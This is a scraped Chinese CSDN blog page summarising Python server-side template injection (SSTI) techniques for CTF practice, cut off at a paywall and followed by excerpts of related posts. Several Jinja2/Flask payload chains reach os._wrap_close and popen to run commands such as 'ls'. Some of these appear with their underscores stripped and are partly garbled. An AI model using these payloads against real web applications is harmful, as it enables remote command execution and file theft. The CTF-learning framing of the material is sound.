SSTI 小结

最新推荐文章于 2023-10-10 18:39:46 发布
最新推荐文章于 2023-10-10 18:39:46 发布
阅读量455 收藏
点赞数
分类专栏: python CTF 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_36359398/article/details/129194918
版权
本文详细介绍了Python SSTI(服务器端模板注入)漏洞的利用方法,包括查找父类`object`的子类,寻找涉及命令执行或文件操作的模块,如`os._wrap_close`的`popen`函数。此外,还讲解了如何利用`globals()`、`import()`等内建函数,以及在Flask和Jinja2框架中的SSTI利用技巧,提供了一种通过遍历数字索引并匹配响应结果来确定可利用类的策略。
摘要由CSDN通过智能技术生成

SSTI 小结


查找子类:
‘’. class. bases[0]. subclasses()
[]. class. bases[0]. subclasses()
[]. class. mro[-1]. subclasses()
实际的索引可能不同,需要动态识别

str(字符串)、dict(字典)、tuple(元组)、list(列表) 的基类都是object
class:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。
bases:用来查看类的基类,也可以使用数组索引来查看特定位置的值。
subclasses():查看当前类的子类组成的列表,即返回基类object的子类。查看子类列表:
for i in enumerate(‘’.class.mro[-1].subclasses()): print(i)

for i in enumerate(object.subclasses()): print(i)
SSTI 的主要目的就是从这么多的子类中找出可以利用的类(一般是指读写文件或执行命令的类)加以利用。
找到父类<type ‘object’> —> 寻找子类 —> 找关于命令执行或者文件操作的模块。
获取基类方法: mro base

builtins 方法是做为默认初始模块出现的,可用于查看当前所有导入的内建函数。
globals:该方法会以字典的形式返回当前位置的所有全局变量。
import():该方法用于动态加载类和函数 。

Python3:
使用file类读取文件的方法: <class ‘_frozen_importlib_external.FileLoader’>这个类索引号;
利用os._warp_close类的 popen函数执行命令:

[].class.mro[-1].subclasses()[128].init.globals’popen’.read()
().class.bases[

最低0.47元/天 解锁文章
Risk2S
关注
专栏目录
【网络安全 | 1.5w字总结SSTI漏洞入门
等风来
08-24 8959
SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,它出现在使用模板引擎的Web应用程序中。模板引擎是一种将动态数据与静态模板结合生成最终输出的工具。然而,如果在构建模板时未正确处理用户输入,就可能导致SSTI漏洞的产生。sql注入的成因是:当后端脚本语言进行数据库查询时,可以构造输入语句来进行拼接,从而实现恶意sql查询。
SSTI例题buu[Flask]SSTI
cuddlylm的博客
04-08 3267
方法一:手注 打开只有这个 访问http://your-ip/?name={{233233}},得到54289,说明它执行了我们的命令,SSTI漏洞存在。 这里的54289是233233的运算结果 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals_
深入理解SSTI. 攻防世界easy_web 附python脚本
shshsj11的博客
04-19 323
这些对象可以被读取和修改,接下来介绍 __builtins__ 是 Python 中一个内置的模块对象,他在python解释器启动时, __builtins__ 对象就会被创建并且自动添加到全局命名空间中,因此 __builtins__ 可以在认可地方访问, __builtins__ 模块包含了很多内置函数,其中就包括我们这提要用的open(),所以我们通过__globals__来访问 __builtins__ 模块中的open函数来达到读取flag文件的目的,记录下第一次自己写脚本。
SSTI(模板注入) 解析 和 ctf 做法
m0_56107268的博客
11-18 2821
ssti注入
浅学Go下的ssti
蚁景网安学院
11-23 682
前言作为强类型的静态语言,golang的安全属性从编译过程就能够避免大多数安全问题,一般来说也唯有依赖库和开发者自己所编写的操作漏洞,才有可能形成漏洞利用点,在本文,主要学习探讨一下golang的一些ssti模板注入问题GO模板引擎Go 提供了两个模板包。一个是text/template,另一个是html/template。text/template对 XSS 或任何类型的 HTML 编码都没有...
python ssti正确利用方式
qq_49973474的博客
05-11 771
很好 很有精神
ssti 常见注入模块利用
2202_75317918的博客
10-10 235
python脚本(这里以重庆橙子科技jinjia2模板注入为例)使用hackbar测试一下使用bp,看不到passwd,直接读取flag是 FileLoader 对象的一个方法,用于获取指定文件的内容。利用时第一个参数为 0 ,第二个参数为文件路径即可。
fenjing工具,ssti
最新发布
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
ssti
2h4ox1n9
05-23 950
[第三章 web进阶]SSTI {{"".__class__.__bases__[0].__subclasses__()}} 执行结果中找到 os命令执行类<class 'os._wrap_close'>从头开始复制到os那里,粘贴到word文档里搜索个128结果,下标127 {{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}} 列目录 ...
Python获取CMD命令行输出结果
weixin_44447687的博客
03-26 3269
Python 用RPA, 艺赛旗RPA 2020.1全新首发免费下载 点击下载 www.i-search.com.cn/index.html?from=line1 一,os.system() 这种方式虽然可以在控制台看到回显的结果,但是却无法接收到这些内容,更无法对结果进行处理 官方文档对返回结果说明如下 在Windows上,返回值是运行命令后系统外壳程序返回的值。…通常是cmd.exe,它返回...
SSTI简单总结和例题
Aiwin的博客
07-21 2881
SSTI简单总结和例题CISCN 2019华东南]Double Secret和[护网杯 2018]easy_tornado
ctfshow-web361(SSTI)
m0_62094846的博客
04-23 601
看到Hello,猜测输入的参数是name
SSTI模板注入讲解与真题实操
告白的博客
02-12 1739
1.什么是SSTI注入? SSTI模板注入(Server-Side Template Injection),通过与服务端模板的 输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的,目前CTF常见的SSTI题中,大部分是考python的。
os.system与os.popen的用法
weixin_41893060的博客
06-29 4662
def decompress(zipFilePath,csvDir): if platform.system() == "Windows": cmd = '7z.exe x %s -o%s' % (zipFilePath, csvDir) else: cmd = '7za x %s -o%s' % (zipFilePath, csvDir) ...
软件测试学习 之 Python 获取CMD命令行输出结果
日暮途远无蹉跎
04-29 6466
本文主要介绍python执行系统命令的几种方式
SSTI Flask做题记录1
Firebasky的博客
10-12 1039
这个知识点是前几天从接触的,是因为创建HDCTF的比赛遇到的于是自己就来记录一下和学习一下 1. ezflask hdctfezflask地址 这个题比较简单,直接一层一层的去找一找利用的类和函数就可以啦 记录一下自己的步骤: 1.{{''.__class__}} # 获得单引号的类型 2.{{''.__class__.__base__}} #获得object 3.{{''.__class__.__base__.__subclasses__()}}#获得基类 4.{{''.__class__.__.
SSTi模板注入漏洞
Aidang的博客
08-23 1664
1.SSTI含义 SSTI是一种注入类的漏洞,其成因也可以类比SQL注入。 SQL注入是从用户获得一个输入,然后用后端脚本语言进行数据库查询,利用输入来拼接我们想要的SQL语句。SSTI也是获取一个输入,然后在后端的渲染处理上进行语句的拼接执行。 但是和SQL注入不同的,SSTI利用的是现有的网站模板引擎,主要针对Python、PHP、JAVA的一些网站处理框架,比如Python的jinja2、mako、tornado、Django,PHP的smarty twig,java的jade velocity。当这
初步认识SSTI
weixin_44377940的博客
04-03 1460
SSTI,即服务端模板注入,起因是服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,从而导致各种各样的问题。 先举一个熟悉一点的语言模板作为例子:php模板引擎Twig 参考文章:http://drops.xmd5.com/static/drops/tips-10205.html https://www.cnblogs.com/h...
flask ssti
09-26
Flask SSTI(Server-Side Template Injection)是指在Flask应用中,由于未正确处理用户输入,导致用户输入的模板言被当作代码执行的漏洞。攻击者可以通过向模板注入恶意代码来执行任意命令或获取敏感信息。要防止...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值